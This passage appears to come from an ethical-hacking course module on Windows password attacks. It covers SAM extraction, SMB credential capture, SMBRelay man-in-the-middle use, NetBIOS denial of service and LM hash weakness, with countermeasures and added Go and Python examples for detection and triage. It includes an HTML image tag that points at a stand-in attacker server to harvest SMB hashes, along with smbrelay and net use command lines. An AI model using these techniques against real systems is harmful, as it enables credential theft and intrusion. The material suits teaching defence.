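// uses: alphabet_size ^ length. Upper and lower case are counted separately;
// a case-folding hash such as LM would merge them and shrink the space.
func keyspace(password string) *big.Int {
	var lower, upper, digit, special bool
	for _, r := range password {
		switch {
		case unicode.IsLower(r):
			lower = true
		case unicode.IsUpper(r):
			upper = true
		case unicode.IsDigit(r):
			digit = true
		default:
			special = true
		}
	}
	alphabet := int64(0)
	if lower {
		alphabet += lowerSize
	}
	if upper {
		alphabet += upperSize
	}
	if digit {
		alphabet += digitSize
	}
	if special {
		alphabet += specialSize
	}
	length := int64(len([]rune(password)))
	return new(big.Int).Exp(big.NewInt(alphabet), big.NewInt(length), nil)
}

func main() {
	// The sample passwords from the text.
	for _, pw := range []string{"secret", "12354", "*%$%@", "a3rf5", "df%g$i", "39*&4", "a#d5y8%"} {
		fmt.Printf("%-10q %-42s candidates: %s\n", pw, classify(pw), keyspace(pw))
	}
}
```

Note that length matters as much as composition: "secret" (letters only, six characters) has a larger keyspace than "a3rf5" (letters and numbers, five characters), so a policy that only demands mixed classes without a minimum length gains little.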

start sidebar
Types of Password Attacks
  • Dictionary attack

  • Brute force attack

  • Hybrid attack

  • Social engineering

  • Shoulder surfing

  • Dumpster diving

end sidebar
 
Note  

Password attacks can be broadly categorized into three types: dictionary attack, brute force attack and hybrid attack. We mentioned this briefly at the beginning of this module.

A dictionary password cracker takes a list of words and encrypts them one at a time to see whether the result matches the one-way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. Some dictionary crackers can also manipulate each word in the wordlist using suitable filters. These rules/filters allow attackers to explore alphanumeric variations such as "gr8" for "great" and so derive the most from the word list. Alternatively, the attacker can choose to pre-process the wordlist. A good example of a wordlist manipulation tool that allows all kinds of ways to filter, expand and alter wordlists is Therion's password utility for DOS.

A brute force cracker simply tries all possible passwords until it finds the right one. From a cracker's perspective, this is a lengthy process. However, given enough time and CPU power, the password eventually gets cracked. Most modern brute force crackers allow a number of options to be specified, such as the maximum password length or the character set to brute force with.

Attack Methods  

Which method an attacker chooses depends on his motive, available resources and the nature of the target system. If he has remotely retrieved the password file of a system, he only needs to crack it to get in; in that context a dictionary attack would appeal, as he already has the user names and password hashes. On the other hand, if the attacker has basic access, such as an insider, he might want to be more specific regarding the user account or privilege. In this context, a brute force attack would appeal. He might also combine both methods to launch a hybrid attack.

start sidebar
Cracking NT/2000 passwords
  • The SAM file in Windows NT/2000 contains the usernames and encrypted passwords. It is located in the %systemroot%\system32\config directory.

  • The file is locked when the OS is running.

    • Booting to an alternate OS

      • NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive.

    • Backup SAM from the Repair directory

      • Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam

    • Extract the hashes from the SAM

      • Use L0phtCrack to extract and crack the password hashes.

end sidebar
 
Concept  

Let us take a look at how Windows NT/2000 passwords are cracked. The passwords are held in the security database, which can be found at the following path: \\WINNT\SYSTEM32\CONFIG\SAM

This file is usually locked while the system is in use. However, once it is no longer held open by any system component, it is world readable by default. Attackers are particularly vigilant in detecting any SAM.SAV files that could be readable, as these can be used to obtain password information.

Attack Methods  

There are tools such as NTFSDOS that are capable of mounting any NTFS partition as a logical drive. NTFSDOS.EXE is a read-only network file system driver for DOS/Windows that is able to recognize and mount NTFS drives for transparent access. It makes NTFS drives appear indistinguishable from standard FAT drives, providing the ability to navigate, view and execute programs on them from DOS or from Windows.

Not all is lost for the attacker if the system is in use and the SAM file is locked. If the system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck, because during the installation of NT/2000 a copy of the password database is put in \\WINNT\REPAIR.

What happens if the system administrator has updated the repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities for dumping the password hashes out, such as pwdump, or even run L0phtCrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

start sidebar
Redirecting SMB Logon to the Attacker
  • Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication against a server of the attacker's choice.

  • The basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

  • When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

end sidebar
 
Concept  

SMB stands for Server Message Block. It is a protocol for sharing files, printers, serial ports and communication abstractions such as named pipes and mail slots between computers. SMB is a client-server, request-response protocol. Once clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files and perform other file operations. The exposure is that with SMB all of this is done over the network. SMB has been used over TCP/IP, NetBEUI, IPX/SPX and NetBIOS, among others.

The SMB model defines two levels of security. The first is share-level protection, applied on the server: each share can have a password, and a client needs only that password to access all files under that share. This was the first security model SMB had. The second is user-level protection, applied to individual files in each share and based on user access rights. Every client wishing to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID, which must be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

Attack Methods  

While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges using sniffing techniques. This may be done directly off the network using tools such as L0phtCrack's SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the L0phtCrack cracking engine.

However, switched networks require a different attack methodology. Here, the attacker will attempt to redirect the SMB logon to obtain the authentication credentials. To do this, a user must be tricked into connecting to an SMB server of the attacker's choice. This may be achieved by sending an email to the victim with an embedded hyperlink to a fraudulent SMB server. The victim unwittingly sends his SMB credentials over the network if he chooses to follow the hyperlink. Windows automatically tries to log in as the current user if no other authentication information is explicitly supplied.

As an example, the following tag, placed in an HTML email, displays nothing in the message, but when the null GIF is loaded by the victim's Internet Explorer, the victim automatically initiates an SMB session with attacker_server:

<img src=file://attacker_server/null.gif height=1 width=1>

SMBCapture listening on attacker_server or its local segment then extracts the LM challenge-response. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

Countermeasure  

Countermeasures include:

  • Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;

  • Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;

  • Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to the SMBCapture attack; SMBCapture will report that it is capturing, but when the captures are sent to L0phtCrack the hashes will not crack within a reasonable time frame.

start sidebar
Hacking Tool: SMB Relay
  • SMBRelay is essentially an SMB server that can capture usernames and password hashes from incoming SMB traffic.

  • It can also perform man-in-the-middle (MITM) attacks.

  • You must disable NetBIOS over TCP/IP and block ports 139 and 445.

  • Start the SMBRelay server and listen for SMB packets:

     c:\>smbrelay /e
     c:\>smbrelay /IL 2 /IR 2

  • An attacker can access the client machine by simply connecting to it via the relay address using: c:\>net use * \\<capture_ip>\c$

end sidebar
 
Tools  

SMBRelay by Sir Dystic of the Cult of the Dead Cow is essentially an SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.

Concept  

SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

Once the attacker has used SMBRelay to connect and authenticate, SMBRelay will disconnect from the target client and bind a new IP address to port 139. This IP address is the relay address. The relay address can be connected to using the 'net use' command and then be used by all networking components available to the Windows machine. The Windows box now relays all SMB traffic, with the exclusion of negotiation and authentication traffic.

The attacker can disconnect from and reconnect to the new IP address as long as the target host stays connected. As SMBRelay is multi-threaded and capable of handling multiple connections simultaneously, it will create new IP addresses sequentially, removing them when the target host disconnects. This ensures that the same IP address is not allowed to connect twice, unless a successful connection to that target was achieved and disconnected. SMBRelay collects the NTLM password hashes transmitted and writes them to hashes.txt in a format usable by L0phtCrack, so the passwords can be cracked later.

The usage is: smbrelay [options]

Options:

  • /D num - Set the debug level; currently valid levels are 0 (none), 1 and 2. Defaults to 0.

  • /E - Enumerate interfaces and their indexes.

  • /F[-] - Fake server only: capture password hashes and do not relay. Use - to disable acting as a fake server if the relay fails.

  • /IL num - Set the interface index to use when adding local IP addresses.

  • /IR num - Set the interface index to use when adding relay IP addresses. Defaults to 1.

  • /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC. Defaults to the primary host IP.

  • /R[-] IP - Set the starting relay IP address to use. Use - to avoid adding each relay IP address to the NIC. Defaults to 192.1.1.1.

  • /S name - Set the source machine name.

The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter, so that traffic always flows through TCP port 139. The server can then capture both LM and NTLM hashes and write them to its working directory as hashes.txt, which can later be imported into L0phtCrack. Furthermore, the attacker's system can now access the client machine by simply connecting to it via the relay address: c:\>net use * \\192.x.x.x\c$

On the client side (W2K), the "net use" command will fail to show any sessions, as the program throws system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

While capturing SMB authentication using a fraudulent server with SMBRelay might look easy, there are several pre-requisites for the attack to be successful. These will be discussed later in the module.

start sidebar
SMBRelay man-in-the-middle Scenario
  • The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T.

    c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

  • When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, records the password hash and passes the connection on to the target server.

end sidebar
 

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

Attack Methods  

As discussed earlier, the attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.

Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R switch and a target server address of 192.168.200.168 with the /T switch:

c:\>smbrelay /L+ 192.168.200.114 /IR 2 /R 192.168.200.252 /T 192.168.200.168

A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

Countermeasure  

One countermeasure is to force the requirement for digitally signed SMB communications under Security Policy/Local Policies/Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection.

SMBRelay attempts to disable SMB signing and may be able to circumvent some of these settings. A significant aspect of MITM attack is the absence of any obvious log entry to indicate that a MITM attack is in progress. This leaves Kerberos as the only real defense against MITM.

Tools  

This brings us to SMBRelay2, which works at the NetBIOS level and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man-in-the-middle attacks against a third host. However, the limitation of this utility is that it currently supports listening on only one name (the local name), so the target must attempt to connect to that name for SMBRelay2 to operate.

start sidebar
SMBRelay Weakness & Countermeasures
  • The problem is to convince a victim's client to authenticate to the MITM server

  • You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

  • Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.

Countermeasures

  • Configure Windows 2000 to use SMB signing.

  • This causes client and server to cryptographically sign each block of SMB communication.

  • These settings are found under Security Policies / Security Options.

end sidebar
 
Note  

There are inherent weaknesses in executing an SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly, SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges, as this is a port number less than 1024.

Moreover, administrative access is required for adding and removing IP addresses, which SMBRelay does in its normal mode of operation. Therefore, privilege escalation would be required in most cases unless privileges have not been properly restricted.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious email, as discussed earlier (using an image to send the server's hyperlink and embedding it using HTML).

Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

Countermeasure  

The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.

Countermeasure  

Another countermeasure is as discussed earlier in the context of SMBRelay MITM - to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection.

Countermeasure  

While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.

Countermeasure  

NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

start sidebar
Hacking Tool: SMB Grind

SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

end sidebar
 

We discussed the password cracker L0phtCrack earlier in the module. Cracking a challenge/response hash captured from the network takes somewhat longer per password than cracking its counterpart obtained from a registry dump. One of the limitations these crackers face is the unique challenge answered separately by each client.

When L0phtCrack finds the password matching one account's sniffed hash, that work does not carry over to the other accounts in the capture. This is because in a network capture each response is computed against a unique challenge, so the work done cracking one password cannot be reused to crack another. This means that the time to completion scales linearly as more password hashes are added to the crack.

One way of increasing the speed of L0phtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Otherwise password cracking becomes a time-consuming, laborious process unless it is targeted at particular passwords.

If an attacker can force a NetBIOS connection from the target, he can retrieve the authentication information of the currently logged-in user. For its part, the SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data, which the client encrypts using the password as an encryption key. If this exchange can be obtained, the session can be hijacked as well. But this is not always easy.

Tools  

SMBGrind is a tool that seeks to solve this problem and make password cracking by L0phtCrack faster. It removes duplicates and saves the file to disk, so that the attacker can e-mail the filtered file directly from within SMBGrind via the File-Send menu option.

start sidebar
Hacking Tool: SMBDie

The SMBDie tool crashes computers running Windows 2000/XP/NT by sending a specially crafted SMB request.

end sidebar
 
Tools  

SMBDie is another tool that takes advantage of a vendor's implementation of a protocol. The vulnerability results from a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs, SMBDie and smbnuke, exploit the vulnerability in the same way.

An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

Windows 2000 Servers and Workstations are not vulnerable as long as the "Additional restrictions for anonymous connections" option in their local security settings is set to "No access without explicit anonymous permissions". Windows XP workstations are susceptible to the SMBDie exploit.

Any machine on the network, including systems connected via VPN, can launch this attack. All an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the Server (LanmanServer) service can be stopped, which prevents the attack but may not be suitable on a file and print sharing server.

start sidebar
Hacking Tool: NBTDeputy
  • NBTdeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.

  • NBTdeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.

  • This tool works well with SMBRelay.

  • For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTdeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET server when logged-on users access "My Network Places".

end sidebar
 
Tools  

NBTdeputy works well in conjunction with SMBRelay. It's similar to Proxy ARP as it helps to resolve the IP address from NetBIOS computer name. NBTdeputy can register a NetBIOS computer name on the network and be ready to respond to NetBT name-query requests.

For example, SMBRelay might be running on a computer as SERVER1 with an IP address of 192.168.10.1. NBTdeputy will register this name and answer with the IP address of SERVER1. When logged-on users access "My Network Places", SMBRelay may connect to any XP or .NET Server. When "My Network Places" is clicked by the logged-on user, Windows XP tries to acquire the list of shared resources of all computers on the LAN. The user's local log-on password is used when the password for the shared resource has not been saved at that instance of access.

In a hybrid local area network where any pre-W2K machine exists, Windows XP will automatically transmit the local log-on password to the NT4.0 machine using LM authentication. Even if the registry value NoLMHash has been set to one, Windows XP automatically transmits the local log-on password to the NT4.0 machine using LM authentication when "My Network Places" is clicked. It should be noted that Windows XP doesn't use LM authentication when there are only Windows 2000 and XP machines on the LAN, even if "LMCompatibilityLevel" is 0. In order to protect the LM hash, Windows XP has a registry value named NoLMHash, located under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. If NoLMHash is set to '1' and the user changes the password, the true LM hash will not be generated.

There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

start sidebar
NetBIOS DoS Attack
  • Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict, so that the system will no longer be able to use it.

  • This will block the client from participating in the NetBIOS network.

  • Tool: nbname

    • NBName can disable entire LANs and prevent machines from rejoining them.

    • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

end sidebar
 
Concept  

NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.

Threat  

For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service, as the legitimate machine is not able to communicate with other NetBIOS hosts.

Tools  

NBName is a tool written by Sir Dystic of the Cult of Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.

Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.
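On the defensive side, the same packets NBName sends are what a monitor on UDP/137 should watch for. The Go program below is an added example, not code from NBName or from the module; it decodes the NBNS header and the first-level encoded name laid out in RFC 1002 and flags a Name Release request for one of the host's own names that the host did not send itself. The packet bytes, the host and source addresses (192.0.2.x) and the names decodeNBNS, decodeName, encodeName and suspiciousRelease are constructed for this example.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// nbnsPacket holds the NBNS header fields and question name that a detector
// on UDP/137 needs. Field and type names are assumptions of this example.
type nbnsPacket struct {
	TransactionID uint16
	IsResponse    bool
	Opcode        uint8 // RFC 1002: 0 query, 5 registration, 6 release, 7 WACK, 8 refresh
	Broadcast     bool
	Name          string // NetBIOS name with the trailing space padding removed
	Suffix        byte   // 16th name byte: 0x00 workstation service, 0x20 server service
}

const opcodeRelease = 6

var opcodeNames = map[uint8]string{0: "query", 5: "registration", 6: "release", 7: "wack", 8: "refresh"}

// encodeName applies RFC 1001 first-level encoding: the name is padded with
// spaces to 15 bytes, the suffix byte is appended, and each nibble of the 16
// bytes is sent as one letter in A..P. Used here only to build the sample.
func encodeName(name string, suffix byte) []byte {
	raw := []byte(fmt.Sprintf("%-15s", strings.ToUpper(name)))[:15]
	raw = append(raw, suffix)
	out := make([]byte, 0, 32)
	for _, b := range raw {
		out = append(out, 'A'+(b>>4), 'A'+(b&0x0F))
	}
	return out
}

// decodeName reverses the encoding and returns the name and suffix byte.
func decodeName(encoded []byte) (string, byte, error) {
	if len(encoded) != 32 {
		return "", 0, errors.New("encoded NetBIOS name must be 32 bytes")
	}
	raw := make([]byte, 16)
	for i := range raw {
		hi, lo := encoded[2*i]-'A', encoded[2*i+1]-'A' // wraps above 15 if not in A..P
		if hi > 15 || lo > 15 {
			return "", 0, errors.New("name character outside A..P")
		}
		raw[i] = hi<<4 | lo
	}
	return strings.TrimRight(string(raw[:15]), " "), raw[15], nil
}

// decodeNBNS parses the 12-byte header and the question name that follows it.
func decodeNBNS(pkt []byte) (nbnsPacket, error) {
	if len(pkt) < 12+1+32+1+4 {
		return nbnsPacket{}, errors.New("packet too short for NBNS header and question")
	}
	flags := binary.BigEndian.Uint16(pkt[2:4])
	p := nbnsPacket{
		TransactionID: binary.BigEndian.Uint16(pkt[0:2]),
		IsResponse:    flags&0x8000 != 0,           // R bit
		Opcode:        uint8((flags >> 11) & 0x0F), // OPCODE, 4 bits
		Broadcast:     flags&0x0010 != 0,           // B bit inside NM_FLAGS
	}
	if pkt[12] != 0x20 { // question name: a length byte, then 32 encoded characters
		return p, errors.New("unexpected question name length")
	}
	name, suffix, err := decodeName(pkt[13:45])
	if err != nil {
		return p, err
	}
	p.Name, p.Suffix = name, suffix
	return p, nil
}

// suspiciousRelease is the detection rule: a Name Release request for one of
// our own names that we did not send is the spoofing pattern the text
// describes (the host would drop the name and stop answering NetBIOS).
func suspiciousRelease(p nbnsPacket, srcIP, ownIP string, ownNames map[string]bool) bool {
	return !p.IsResponse && p.Opcode == opcodeRelease && srcIP != ownIP && ownNames[p.Name]
}

// sampleReleaseRequest is a constructed Name Release Request for the name
// WORKSTATION1<00>, laid out as RFC 1002 describes: header, question, and
// the additional record carrying the address. Addresses are constructed.
func sampleReleaseRequest() []byte {
	pkt := []byte{
		0x00, 0x2a, // NAME_TRN_ID
		0x30, 0x10, // R=0, OPCODE=6 (release), NM_FLAGS: B=1, RCODE=0
		0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, // QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
		0x20, // question name length
	}
	pkt = append(pkt, encodeName("WORKSTATION1", 0x00)...)
	pkt = append(pkt, 0x00, 0x00, 0x20, 0x00, 0x01) // end of name; QUESTION_TYPE NB; QUESTION_CLASS IN
	// additional record: name pointer, type NB, class IN, TTL 0, RDLENGTH 6, NB_FLAGS, NB_ADDRESS 192.0.2.10
	pkt = append(pkt, 0xC0, 0x0C, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 192, 0, 2, 10)
	return pkt
}

func main() {
	p, err := decodeNBNS(sampleReleaseRequest())
	if err != nil {
		fmt.Println("decode error:", err)
		return
	}
	own := map[string]bool{"WORKSTATION1": true}
	fmt.Printf("txid=%d opcode=%s broadcast=%v name=%q<%02X>\n",
		p.TransactionID, opcodeNames[p.Opcode], p.Broadcast, p.Name, p.Suffix)
	fmt.Println("alert:", suspiciousRelease(p, "192.0.2.99", "192.0.2.10", own))
}
```

A release request a host sends for its own name when shutting down is normal; the same request arriving from another address, or a burst of them for many names on the segment, is the /CONFLICT pattern above and is worth alerting on, because the victim itself logs nothing beyond a name conflict.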

start sidebar
Hacking Tool: John the Ripper
  • It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free.

  • The resulting passwords are case insensitive and may not represent the real mixed-case password.

click to expand
end sidebar
 
Tools  

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto-detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used, such as bitslice DES, require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

start sidebar
What is LanManager Hash?

Example: Let's say your password is: '123456qwerty'

  • When this password is encrypted with the LM algorithm, it is first converted to all uppercase: '123456QWERTY'

  • The password is padded with null (blank) characters to make it 14 characters long: '123456QWERTY_'

  • Before encrypting this password, the 14 character string is split in half: '123456Q' and 'WERTY_'

  • Each string is individually encrypted and the results concatenated.

  • '123456Q' = 6BF11E04AFAB197F

    'WERTY_' = F1E9FFDCC75575B15

  • The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

end sidebar
 
Note  

–  In this example the first half covers a full seven-character alphanumeric string; the module quotes roughly 24 hours for L0phtCrack to brute-force it. The second half covers only five characters plus two null bytes and falls in about 60 seconds.

All Windows clients, including Windows 2000, Windows Server 2003 and Windows XP, are configured by default to send both LM and NTLM authentication responses; Windows 9x clients send only LM. The default setting on servers allows all clients to authenticate and use their resources, but it also means that LM responses, the weakest form of authentication response, travel over the network. This makes them attractive to an attacker who can sniff the traffic and crack the passwords with relatively little effort.

Microsoft Windows NT stores two hashes of each password: a LAN Manager (LM) hash and a Windows NT hash. As discussed in module four, the domain controller issues an eight-byte challenge, and the client (server or workstation) replies with a twenty-four-byte response computed from the challenge and the stored hash. The challenge and the response travel in the clear, so anyone sniffing the segment can capture the pair and attack it offline. If the domain controller validates the response, it returns an NT session key and a LAN Manager (LM) session key; these session keys are encrypted between the client and the domain controller.

Let us now take a look at the LAN Manager hash. LAN Manager works on a fourteen-byte password: the password is converted to upper case and, if it is shorter than fourteen bytes, padded with null bytes. It is then split into two seven-byte halves. From each seven-byte half an eight-byte odd-parity DES key is constructed, and each DES key is used to encrypt the same fixed eight-byte constant (the "magic number", the ASCII string KGS!@#$%). The two eight-byte results are concatenated into a sixteen-byte one-way hash value: the LAN Manager hash of the password.

Threat  

What makes the LM hash vulnerable is that an attacker never has to search more than seven characters at a time to recover passwords of up to fourteen characters, and there is no salt (randomness) involved, so identical passwords always produce identical hashes. If the password is seven characters or less, the second half is always the constant 0xAAD3B435B51404EE, which tells the attacker immediately that only one half needs cracking. If it is longer, say ten characters, it is split into a seven-character half and a three-character half (padded with nulls); the three-character half is cracked almost instantly with a cracker such as L0phtCrack, and the recovered characters often hint at the rest of the password.
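The weaknesses described above can be exploited in triage before any cracking starts. The following Python is an added example, not part of the original module and not code from John the Ripper or L0phtCrack: it parses pwdump-style lines (user:rid:lmhash:nthash:::), flags which accounts have a crackable LM hash and which passwords are seven characters or shorter (second half equal to 0xAAD3B435B51404EE), shows the uppercase-pad-split step on '123456qwerty', and expands a seven-byte half into the eight-byte odd-parity DES key. The sample dump is constructed; apart from the empty-password LM hash and the empty-password NT hash (31D6CFE0D16AE931B73C59D7E0C089C0) its hash values are placeholders, and the DES encryption step itself is not implemented.

```python
"""LM hash triage over a pwdump-style dump.

Added example for this module; not code from John the Ripper, L0phtCrack or the
original text. It does not implement DES: it shows everything around it that
makes LM weak, and classifies which halves are worth the cracker's time.
"""

EMPTY_HALF = "AAD3B435B51404EE"        # LM value of a seven-byte block of nulls
NO_LM = EMPTY_HALF * 2                 # empty password, or LM storage disabled
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of the empty password

# Constructed sample dump in pwdump format: user:rid:lmhash:nthash:::
# The Administrator and jsmith hash values are placeholders, not real hashes.
SAMPLE_DUMP = """\
# user:rid:lmhash:nthash:::
Administrator:500:0123456789ABCDEF89ABCDEF01234567:FEDCBA9876543210FEDCBA9876543210:::
guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
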